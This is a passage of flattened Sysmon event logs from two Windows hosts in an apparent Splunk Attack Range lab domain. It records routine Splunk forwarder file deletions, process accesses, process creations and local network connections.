23542300x8000000000000000103230Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.680{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FCA621D07DB65B85560B5BAC6560E4,SHA256=40F3932F8F53B9A1BA4B361482730FACAFC9152BFB28291FF81D2276AF5C7E6E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103229Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.446{58E9C193-B1EF-615A-C001-00000000FC01}380776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103228Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.399{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E6B36881E5BFD9F9A8D63025F275DC6,SHA256=FF69C1247DF945A348D089A9711868B7DF29C62FE57B0D55713D6C5C9B8965A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103227Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.258{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1EF-615A-C001-00000000FC01}380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103226Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.258{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103225Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.258{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103224Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.258{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103223Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.258{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103222Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.258{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B1EF-615A-C001-00000000FC01}380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103221Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.258{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1EF-615A-C001-00000000FC01}380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103220Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.259{58E9C193-B1EF-615A-C001-00000000FC01}380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000103219Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.559{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49504-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000103218Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.559{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49504-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000103217Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.462{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-639.attackrange.local49503-false10.0.1.14win-dc-639.attackrange.local389ldap 354300x8000000000000000103216Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.462{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49503-false10.0.1.14win-dc-639.attackrange.local389ldap 23542300x800000000000000081107Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:04.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D76710D413C2D0E1AB0865FA0D5A6E56,SHA256=802117A007D3CB3007E617628165EBA03DA034D79402E1E6C8327F924A4D357F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103241Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:04.899{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80EA222511ED4B374E6726F539A40560,SHA256=FA720F8BC9777DE2A46765AC7C7BC63A32A8B3FB16C0F6B5AF630A4CC42939B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103240Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:04.696{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC0E757BD0616D81F1057685B6192EFD,SHA256=00C7FC77909988FA699AF1E86CC148A668CA5F5BE9314BF95F5FAE1E639055CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103239Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:04.165{58E9C193-B1EF-615A-C101-00000000FC01}68126372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081108Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:05.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=137D98E35F0465823BC232D51260D9E7,SHA256=0E3F15A98F58DBDA41F43AED90B091F4342804AD50E78B6ADD52B42661325556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103251Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:05.696{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BBA04920BA63AB79382BC06FB41BAA8,SHA256=D22BDF7E8E3C51227138129A22D71316200F5872230BDD6D969C8CA99AB6E40E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103250Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:05.430{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1F1-615A-C201-00000000FC01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103249Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:05.430{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103248Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:05.430{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103247Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:05.430{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103246Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:05.430{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103245Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:05.430{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B1F1-615A-C201-00000000FC01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103244Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:05.430{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1F1-615A-C201-00000000FC01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103243Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:05.431{58E9C193-B1F1-615A-C201-00000000FC01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000103242Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:03.400{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49505-false10.0.1.12-8000- 23542300x8000000000000000103255Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:06.868{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5B9A4F3971B7541F5369EFBC8A8941BE,SHA256=44ED0A3325D72256CF877F22A054ED72CA7150E12C3C85D4323298ABFB70BD80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103254Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:06.868{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3EBB728275D212E0C02712C808E92B27,SHA256=3525CAE130E53EB0D2AD8473794A5CED0287D14FA7D099C91E778654CA341311,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103253Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:06.696{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E45292826CA59D056D1A1862C49DD097,SHA256=DE88E77297CEBC7DEBA98785B242B542E21E5E0CADFED856E31631149C501091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081110Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:06.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC494130A24C450E903E8CC76E322E15,SHA256=ED43B467F4E6146517ED4161EC5373AE6946681BF5C80B2E9C5ACCB155722E05,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081109Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:03.714{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50005-false10.0.1.12-8000- 23542300x8000000000000000103252Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:06.430{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92C92F2B20E8C3A5F1463FB0205A16B6,SHA256=AC65AB3B69FA711E9B387A13318608DB5107DDB8283E06DEBE8473E525914143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103256Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:07.696{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=750BCC77BDFBC63BA0B77BA70F5D9619,SHA256=CDB9AFD4A16FD4D66921090330D8E05C04D86A332BA7CC774A65C9C6CD1323ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081111Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:07.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=343D71FA24E59F2CB58898DD065F2253,SHA256=C7EEC622546D35555092F3D9A8D6D662D130CF84545974DF3783299A617D4A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081112Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:08.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 